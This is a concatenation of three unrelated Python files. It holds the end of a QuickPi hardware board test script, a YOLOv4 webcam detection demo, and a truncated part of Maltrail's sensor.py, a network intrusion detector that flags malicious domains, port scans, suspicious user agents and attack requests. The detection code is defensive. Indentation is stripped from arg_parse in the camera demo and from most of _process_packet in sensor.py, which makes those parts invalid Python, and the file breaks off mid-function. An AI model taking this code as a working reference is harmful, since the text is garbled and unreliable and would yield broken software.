            # The LED must raise the measured light level by more than 4.
            if (level_on - level_off) <= 4:
                print("Failed Diff", level_on - level_off)
                return False
    return True
def testBuzzer():
    """Toggle the passive buzzer and verify the microphone hears it."""
    print("Blinking Buzzer")
    deadline = time.time() + 1
    while time.time() < deadline:
        changePassiveBuzzerState(12, 1)
        loud = getAverageSoundLevel(0.05)
        changePassiveBuzzerState(12, 0)
        quiet = getAverageSoundLevel(0.05)
        # The buzzer must raise the sound level by at least 1.
        if (loud - quiet) < 1:
            print("Failed: diff", loud - quiet)
            return False
    return True
def testButtons():
    # Interactive test: the operator must press every button once.  Each
    # newly seen button is drawn as a circle on the OLED; the test returns
    # True once all expected buttons have been pressed at least once.
    print("Press all buttons")
    buttons_expected = [7, 8, 9, 10, 11, 26]
    buttons_already_pressed = []
    cleared = False                     # OLED background drawn yet?
    while True:
        # Count how many buttons are down right now; ignore chords so a
        # single stuck/pressed pair can't register two at once.
        how_many_pressed = 0
        for button in buttons_expected:
            if (buttonStateInPort(button)):
                button_pressed = button
                how_many_pressed = how_many_pressed + 1
        if how_many_pressed == 1:
            if button_pressed not in buttons_already_pressed:
                buttons_already_pressed.append(button_pressed)
                buttons_already_pressed.sort()
                print(buttons_already_pressed)
                # Lazily clear/frame the display on the first press.
                if not cleared:
                    fill(0)
                    noStroke()
                    drawRectangle(0, 0, 127, 31)
                    fill(1)
                    cleared = True
                # Draw a marker at a position matching the button's role.
                if button_pressed == 7: #center
                    drawCircle(17, 15, 6)
                elif button_pressed == 8: # right
                    drawCircle(28, 15, 6)
                elif button_pressed == 9: # Down
                    drawCircle(17, 25, 6)
                elif button_pressed == 10: # up
                    drawCircle(17, 6, 6)
                elif button_pressed == 11: # Left
                    drawCircle(6, 15, 6)
                elif button_pressed == 26: #Button2
                    drawCircle(50, 15, 6)
        # Both lists are kept sorted, so equality means "all seen".
        if buttons_already_pressed == buttons_expected:
            return True
        time.sleep(0.1)
def testIRTransAndReceiver():
    """Drive the IR emitter and verify the receiver tracks it (active low)."""
    print("Testing infrared emiter and receiver")
    deadline = time.time() + 1
    while time.time() < deadline:
        # Emitter on -> receiver must read 0; emitter off -> must read 1.
        for state, expected in ((1, 0), (0, 1)):
            setInfraredState(22, state)
            time.sleep(0.2)
            if not getIrReceiver(0.1, expected):
                return False
    return True
def waitForBoard():
    """Block until a board with exactly the expected i2c devices is attached."""
    global expected_i2c
    while True:
        present = listi2cDevices()
        if len(present) > 0:
            if present == expected_i2c:
                return
            missing = list(set(expected_i2c) - set(present))
            print("board is missing devices", missing)
            # 0x3c (60) is the OLED: if it answered, show the message on it.
            if 60 in present:
                displayTextOled("Missing device:", str(missing))
        time.sleep(0.5)
def waitForBoardRemoved(string):
    """Flash `string` on the OLED until the board vanishes from the i2c bus."""
    global expected_i2c
    invert = False
    while True:
        displayTextOled(string, "", invert)
        invert = not invert
        if len(listi2cDevices()) == 0:
            return
        time.sleep(0.5)
def waitForBoardUp():
    """Beep until the board is held level, face up (z ~ +1 g), for 5 reads.

    Returns False if the accelerometer reads all zeros (sensor gone).
    """
    stable = 0
    buzzer_on = False
    while True:
        buzzer_on = not buzzer_on
        changePassiveBuzzerState(12, buzzer_on)
        accel = readAccelBMI160()
        if accel == [0, 0, 0]:
            return False
        level = (-0.2 <= accel[0] <= 0.2 and
                 -0.2 <= accel[1] <= 0.2 and
                 0.8 <= accel[2] <= 1.2)
        stable = stable + 1 if level else 0
        if stable > 4:
            changePassiveBuzzerState(12, False)
            return True
        time.sleep(0.2)
def waitForBoardDown():
    """Beep until the board is held level, face down (z ~ -1 g), for 5 reads.

    Returns False if the accelerometer reads all zeros (sensor gone).
    """
    stable = 0
    buzzer_on = False
    while True:
        buzzer_on = not buzzer_on
        changePassiveBuzzerState(12, buzzer_on)
        accel = readAccelBMI160()
        if accel == [0, 0, 0]:
            return False
        level = (-0.2 <= accel[0] <= 0.2 and
                 -0.2 <= accel[1] <= 0.2 and
                 -1.2 <= accel[2] <= -0.8)
        stable = stable + 1 if level else 0
        if stable > 4:
            changePassiveBuzzerState(12, False)
            return True
        time.sleep(0.2)
# Integrated gyro angles [x, y, z] accumulated by gyro_thread.
angles = [0, 0, 0]
# Per-axis gyro zero-rate offsets measured by gyro_calibration_thread.
calibration = [0, 0, 0]
# Set to True to ask gyro_thread to exit.
stop_gyro = False
def testGyro():
    """True iff the board was rotated roughly 90 degrees about x or y."""
    global angles
    print("Gyro", angles)
    tilt_x = abs(angles[0])
    tilt_y = abs(angles[1])
    return any(60 < tilt < 120 for tilt in (tilt_x, tilt_y))
import statistics
def gyro_calibration_thread():
    """Average 1000 gyro readings into the global `calibration` offsets."""
    global calibration
    sample_target = 1000
    taken = 0
    while taken < sample_target:
        reading = readGyroBMI160()
        for axis in range(3):
            calibration[axis] += reading[axis]
        taken += 1
    for axis in range(3):
        calibration[axis] /= taken
def gyro_thread():
    # Background thread: integrate calibrated gyro rates into the global
    # `angles` until `stop_gyro` is set.
    global angles
    global calibration
    global stop_gyro
    # readGyroBMI160()[3] is the sensor timestamp; 3.9e-5 converts one
    # timestamp tick into seconds -- TODO confirm against the BMI160 datasheet.
    lasttime = readGyroBMI160()[3]
    start = time.time()
    while True:
        if stop_gyro:
            break
        values = readGyroBMI160()
        dt = (values[3] - lasttime) * 3.9e-5
        lasttime = values[3]
        # Subtract the zero-rate offsets and accumulate angle = rate * dt.
        angles[0] += (values[0] - calibration[0]) * dt
        angles[1] += (values[1] - calibration[1]) * dt
        angles[2] += (values[2] - calibration[2]) * dt
# Top-level test sequence: each stage runs only if the previous one passed
# (each guard re-checks result[0]); `result` is the [passed, name] pair of
# the last executed test.
try:
    print("Waiting for board...")
    waitForBoard()
    displayTextOled("Board detected")
    time.sleep(2)
    displayTextOled("Press all buttons")
    checkTest(testButtons(), "buttons")
    threading.Thread(target=gyro_calibration_thread).start()
    result = checkTest(testIRTransAndReceiver(), "irtransrecv")
    if result[0]:
        result = checkTest(testAccelerometerLSM303C(), "accel-lsm303c")
    if result[0]:
        result = checkTest(testAccelerometerBMI160(), "accel-bmi160")
    if result[0]:
        result = checkTest(testI2cDevices(), "i2c-devices")
    if result[0]:
        displayTextOled("Put board face down")
        print("Waiting for board to be face down...")
        result = checkTest(waitForBoardDown(), "facedown")
    if result[0]:
        # Gyro integration starts once the board is in a known orientation.
        threading.Thread(target=gyro_thread).start()
        displayTextOled("", "")
        result = checkTest(testLeds(), "leds")
    if result[0]:
        result = checkTest(testDistanceVL53l0x(False), "distance")
    if result[0]:
        displayTextOled("Put board face up")
        print("Waiting for board to be face up...")
        result = checkTest(waitForBoardUp(), "boardup")
    if result[0]:
        result = checkTest(testDistanceVL53l0x(True), "distance")
    if result[0]:
        result = checkTest(testGyro(), "gyro")
    stop_gyro = True
    boardstatus = ""
    # Build a short serial: random byte `a` plus checksum byte b = (a*229)&0xFF,
    # both hex-encoded; used in the display and the result file name.
    a = random.randrange(0, 255)
    b = a * 229
    b = b & 0xFF
    a = "%0.2X" % a
    b = "%0.2X" % b
    if result[0]:
        print("BOARD PASSED ALL TEST")
        displayTextOled("PASS " + b + a)
        boardstatus = "BOARD OK"
        os.system("echo " + str(result[1]) + " > /mnt/data/" + a + b)
    else:
        print("BOARD failed ", result[1])
        displayTextOled("FAIL", result[1])
        boardstatus = "FAIL"
        os.system("echo " + str(result[1]) + " > /mnt/data/" + a + b + "failed")
    waitForBoardRemoved(boardstatus + " " + a + b)
except Exception as e:
    displayTextOled("FAIL")
    print(e)
changePassiveBuzzerState(12, False)
# NOTE(review): bare `sleep` -- presumably exported by `from quickpi import *`;
# otherwise this should be time.sleep(3). Confirm.
sleep(3)
|
camera.py | # -*- coding: utf-8 -*-
'''
@Time : 2020/04/26 15:48
@Author : Tianxiaomo
@File : camera.py
@Noice :
@Modificattion :
@Author :
@Time :
@Detail :
'''
from __future__ import division
import cv2
from models import *
#from tool.darknet2pytorch import Darknet
import argparse
from tool.utils import *
import time
from cfg import Cfg
import threading
def play_sound():
    """Play the alert mp3 through the external mpg321 player (blocking)."""
    # `os` is not imported explicitly anywhere visible in this file; import it
    # locally so the function works regardless of what the star-imports expose.
    import os
    # Fixed command string -- no untrusted input reaches the shell here.
    os.system('mpg321 test1.mp3')
def arg_parse():
"""
Parse arguements to the detect module
"""
parser = argparse.ArgumentParser(description='YOLO v4 Cam Demo')
parser.add_argument("--confidence", dest="confidence", help="Object Confidence to filter predictions", default=0.25)
parser.add_argument("--nms_thresh", dest="nms_thresh", help="NMS Threshhold", default=0.4)
parser.add_argument("--reso", dest='reso', help=
"Input resolution of the network. Increase to increase accuracy. Decrease to increase speed",
default="160", type=str)
parser.add_argument("--num_classes", dest="num_classes", help="Number of classes", default=2)
parser.add_argument("-w","--weightsfile", dest="weightsfile", help="Weights File", default="checkpoints/Yolov4_epoch300.pth")
return parser.parse_args()
if __name__ == '__main__':
    cfgfile = "cfg/yolov4.cfg"
    args = arg_parse()
    confidence = float(args.confidence)
    nms_thesh = float(args.nms_thresh)
    num_classes = int(args.num_classes)
    bbox_attrs = 5 + num_classes
    class_names = load_class_names("data/_classes.txt")
    model = Yolov4(n_classes=num_classes)
    # NOTE(review): map_location='cuda' fails on CPU-only machines -- consider
    # mapping to 'cpu' when torch.cuda.is_available() is False.
    pretrained_dict = torch.load(args.weightsfile, map_location=torch.device('cuda'))
    model.load_state_dict(pretrained_dict)
    if torch.cuda.is_available():
        model.cuda()
    model.eval()
    # Open the default camera and run detection frame by frame.
    cap = cv2.VideoCapture(0)
    assert cap.isOpened(), 'Cannot capture source'
    frame_width = int(cap.get(3))
    frame_height = int(cap.get(4))
    frames = 0
    start = time.time()
    count = 0   # frames since the last alert sound
    while cap.isOpened():
        ret, frame = cap.read()
        if ret:
            # NOTE(review): cv2.resize takes (width, height); passing
            # (Cfg.height, Cfg.width) swaps the axes unless they are equal --
            # confirm against Cfg.
            sized = cv2.resize(frame, (Cfg.height, Cfg.width))
            # Per the original author, frames captured here are already in the
            # channel order do_detect expects, so no BGR->RGB conversion.
            boxes = do_detect(model, sized, 0.5, num_classes, 0.4)
            orig_im, warn = plot_boxes_cv2(frame, boxes, class_names=class_names)
            cv2.imshow("frame", orig_im)
            key = cv2.waitKey(1)
            if key & 0xFF == ord('q'):
                break
            frames += 1
            count += 1
            print("FPS of the video is {:5.2f}".format(frames / (time.time() - start)))
            # At most one alert per 100 frames while a warning is active.
            # (`&` works here because both operands are boolean-ish, but `and`
            # is the intent.)
            if warn & (count >= 100):
                t = threading.Thread(target = play_sound)
                t.start()
                count = 0
        else:
            break
|
sensor.py | #!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
# --- module-wide runtime state shared by the capture/worker machinery ---
_buffer = None                # shared packet buffer (mmap) for worker handoff
_caps = []                    # open capture handles, one per interface
_connect_sec = 0              # second mark of the current port-scan window
_connect_src_dst = {}         # "src~dst" -> set of destination ports this window
_connect_src_details = {}     # "src~dst" -> set of (sec, usec, sport, dport)
_count = 0
_locks = AttribDict()
_multiprocessing = None       # set to the multiprocessing module when in use
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)  # memoized lookups by (type, key)
_last_syn = None              # last observed SYN tuple (burst de-duplication)
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()

# pcapy is mandatory for capture; bail out with install instructions if missing.
try:
    import pcapy
except ImportError:
    if IS_WIN:
        exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
    else:
        msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
        exit(msg)
def _check_domain_member(query, domains):
    """Return True if `query` or any parent-domain suffix of it is in `domains`."""
    labels = query.lower().split('.')
    return any('.'.join(labels[i:]) in domains for i in range(len(labels)))
def _check_domain_whitelisted(query):
    """Memoized check of whether `query`'s domain part is whitelisted."""
    cache_key = (CACHE_TYPE.DOMAIN_WHITELISTED, query)
    cached = _result_cache.get(cache_key)
    if cached is None:
        # Keep only the leading run of DNS-safe characters before matching.
        candidate = re.split(r"(?i)[^A-Z0-9._-]", query or "")[0]
        cached = _check_domain_member(candidate, WHITELIST)
        _result_cache[cache_key] = cached
    return cached
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
    # Check a DNS query name against the trails feeds (regex trails, .onion
    # trails, exact/parent-domain trails) and the long-domain heuristic,
    # logging an event on any hit.  Negative results are cached.
    if query:
        query = query.lower()
        if ':' in query:
            query = query.split(':', 1)[0]
    if query.replace('.', "").isdigit():  # IP address
        return
    # Known-negative from a previous call: nothing to do.
    if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:
        return
    result = False
    if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
        parts = query.split('.')
        # 1) Regex trails: one combined pattern with one named group per trail.
        if trails._regex:
            match = re.search(trails._regex, query)
            if match:
                group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
                # Recover the original trail text from the combined pattern by
                # the matched group's index.
                candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
                candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
                if candidate in trails:
                    result = True
                    trail = match.group(0)
                    # Parenthesize the non-matching prefix/suffix for display.
                    prefix, suffix = query[:match.start()], query[match.end():]
                    if prefix:
                        trail = "(%s)%s" % (prefix, trail)
                    if suffix:
                        trail = "%s(%s)" % (trail, suffix)
                    trail = trail.replace(".)", ").")
                    log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
        # 2) Tor .onion trails.
        if ".onion." in query:
            trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
            _ = trail.split('(')[0]
            if _ in trails:
                result = True
                log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
        # 3) Exact or parent-domain trails, longest suffix first.
        if not result:
            for i in xrange(0, len(parts)):
                domain = '.'.join(parts[i:])
                if domain in trails:
                    if domain == query:
                        trail = domain
                    else:
                        _ = ".%s" % domain
                        trail = "(%s)%s" % (query[:-len(_)], _)
                    # Skip infrastructure hostnames of sinkholed/suspicious
                    # domains and www/bare hits on dynamic-DNS providers.
                    if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))):  # e.g. ns2.nobel.su
                        if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))):  # e.g. noip.com
                            result = True
                            log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
                    break
        # 4) Heuristic: unusually long first label (DGA-like), minus whitelist.
        if not result and config.USE_HEURISTICS:
            if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
                trail = None
                if len(parts) > 2:
                    trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
                elif len(parts) == 2:
                    trail = "(%s).%s" % (parts[0], parts[1])
                else:
                    trail = query
                if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
                    result = True
                    log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
    # Cache the negative outcome so repeat queries short-circuit above.
    if result == False:
        _result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or "%s:%s" % (dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = dst_ip if dst_ip in trails else "%s:%s" % (dst_ip, dst_port)
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or "%s:%s" % (src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = src_ip if src_ip in trails else "%s:%s" % (src_ip, src_port)
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\bX-Forwarded-For:\s*([0-9.]+)", packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found:
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
